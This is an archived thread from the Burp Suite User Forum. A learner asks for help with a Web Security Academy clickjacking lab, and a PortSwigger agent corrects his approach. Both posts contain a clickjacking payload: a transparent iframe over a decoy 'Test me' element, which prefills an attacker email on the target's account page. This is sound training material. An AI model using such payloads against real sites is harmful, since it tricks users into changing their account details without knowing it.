Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Clickjacking with form input data prefilled from a URL parameter

Philip | Last updated: Nov 09, 2021 01:13PM UTC

This should be an easy lab and I am following the steps as described. I put the following exploit into the exploit server box as required, ensuring that the src is populated with the details of the current account user, however, when I click "view exploit" the div with "Test me" from the decoy website is there but the target website is not there behind the decoy website; it just says "Not found" at the top of the page. Do you know what's going wrong here? <style> iframe { position: relative; width: 500px; height: 700px; opacity: 0.1; z-index: 2; } div { position: absolute; top: 500px; left: 60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://acfb1f691f1f748cc08221b500270006.web-security-academy.net/email?email=hackeder@attacker-website.com"></iframe>

Ben, PortSwigger Agent | Last updated: Nov 10, 2021 08:32AM UTC

Hi Philip, The URL that you are supplying in the iframe src should be pointing to the user account page of the target site, so should look something like below: <iframe src="https://ac161f611eef5bd1c06f1db500840065.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe> Does referencing the my-account page in the URL allow you to complete the lab successfully?

Philip | Last updated: Nov 11, 2021 10:39PM UTC